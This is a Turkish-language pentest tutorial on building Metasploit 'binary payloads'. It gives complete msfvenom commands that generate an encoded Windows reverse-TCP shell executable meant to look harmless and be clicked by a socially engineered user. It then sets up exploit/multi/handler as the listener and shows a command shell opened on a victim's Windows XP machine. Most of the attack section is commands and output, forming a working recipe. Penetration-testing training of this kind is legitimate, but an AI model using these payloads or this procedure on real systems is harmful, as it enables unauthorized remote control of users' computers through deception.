MSF Binary Payloads

Estimated read time 5 min read

İstemci Taraflı Saldırılar

İstemci tarafı saldırılar, tüm ağ yöneticilerinin dikkat etmesi gerekli türden saldırılardır. Sisteminizin güvenliğini ne kadar sağlasanız da istemci tarafı saldırılar, kullanıcılarınızın zafiyetlerini kullanırlar.

Pentest işlemi gerçekleştirenler, sistemde bulunan kullanıcının, bir şekilde linke tıklamasını veya zararlı yazılım çalıştırmasını sağladığında kendilerine hedef sistemde kapı açmış olurlar. Bu sebeple, istemci taraflı saldırılar, kullanıcıyla etkileşim gerektirmektedir. Bu tür saldırılar, sosyal mühendislik çalışmalarını da gerektirir.

Metasploit Framework, bu tür zararlı kodların oluşturması için bir çok modül sağlamaktadır.

binary payloads

binary payloads olarak adlandırılan çalıştırılabilir dosyalar, zararsız .exe dosyaları gibi görünse de aslında içinde tehlikeli kodlar bulunduran dosyalardır. Dosyayı alacak kullanıcıya, önemli bir dosya hissi uyandırarak tıklaması sağlanır ve zararlı kod çalışır.

Bu yazıda, Metasploit Framework tarafından sağlanan msfvenom komut satırı aracı kullanılacaktır. msfvenom kullanarak .exeperl veya c program çıktıları elde edebilirsiniz. Burada .exe formatı kullanılacaktır.

Windows Reverse Shell Açan Payload Oluşturma

Hedef kullanıcının zararlı programı çalıştırdığında dinleyen IP adresine bağlanması için bir payload oluşturmak için windows/shell/reverse_tcp modülünü kullanacağız. Öncelikle bu modülün çalışmak için hangi değişkenlere ihtiyaç duyduğuna bakalım.

root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:


    Name: Windows Command Shell, Reverse TCP Stager
   Module: payload/windows/shell/reverse_tcp
  Platform: Windows
    Arch: x86
Needs Admin: No
 Total size: 281
    Rank: Normal

Provided by:
  spoonm 
  sf 
  hdm 
  skape 

Basic options:
Name   Current Setting Required Description
----   --------------- -------- -----------
EXITFUNC process     yes    Exit technique (Accepted: '', seh, thread, process, none)
LHOST           yes    The listen address
LPORT   4444       yes    The listen port

Description:
 Spawn a piped command shell (staged). Connect back to the attacker

Bu modül, çıktıda görüldüğü gibi LHOST ve LPORT değişkenlerinin ayarlanmasına ihtiyaç duymaktadır. Hedef platform olarak x86 mimari ve Windows işletim sistemi seçilmiştir. Oluşturacağımız payload için bir encoder kullanmamız gerekiyor. Bunun için de x86/shikata_ga_nai encoder modülünü kullanacağız. Bu şartlar altında aşağıdaki komut, encoder kullanarak /tmp klasörünün içinde 1.exe isimli bir dosya oluşturacaktır.

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
Saved as: /tmp/1.exe

1.exe dosyamızın türünü kontrol edelim. file komutuyla yaptığımız kontrolde 1.exe doyasının MS Windows dosyası olduğu aşağıda görülmektedir.

root@kali:~# file /tmp/1.exe
/tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Dinleme Ayarları

Elimizde istemcinin tıklayıp çalıştıracağı 1.exe dosyası artık hazır durumda. Şimdi, tıklama işlemi gerçekleştiğinde dinleyecek bir modülü çalıştırmamız gerekiyor. Bunun için exploit/multi/handler modülünü ve içinde payload windows/shell/reverse_tcp dinleyici payload u kullanacağız.

Öncelikle exploit/multi/handler modülünü yükleyip seçeneklere bakalım.

msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

  Name Current Setting Required Description 
  ---- --------------- -------- ----------- 


Exploit target:

  Id Name      
  -- ----      
  0  Wildcard Target

Gördüğünüz gibi exploit modülünde herhangi bir zorunlu değişken bulunmuyor. Şimdi payload ayarlaması yapalım.

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

  Name Current Setting Required Description
  ---- --------------- -------- -----------


Payload options (windows/shell/reverse_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  EXITFUNC thread      yes    Exit technique: seh, thread, process
  LHOST           yes    The local address
  LPORT   4444       yes    The local port


Exploit target:

  Id Name
  -- ----
  0  Wildcard Target 

Bu çıktıda görülmektedir ki Payload için LHOST ve LPORT değerlerinin girilmesi gerekmekte.

LHOST: Local Host yani yerelde dinleyecek IP adresini,

LPORT: Local Port, yani dinleyecek Port numarasını ifade eder.

Bu değerlerin, msfvenom komutuyla oluşturduğumuz 1.exe dosyası için girdiğimiz değerler ile aynı olmasına dikkat edin. 1.exe dosyası içinde hangi değerler gömülü ise zararlı yazılım bu bilgilere göre haberleşme sağlamak isteyecektir.

msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >

Tüm ayarlamaları yaptıktan sonra exploit komutuyla modül çalıştırılır ve dinlemeye başlanır. Aşağıda, dinleme sonucunda gerçekleşen bir istemci tıklaması sonucu açılan komut satırı görülmektedir.

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents>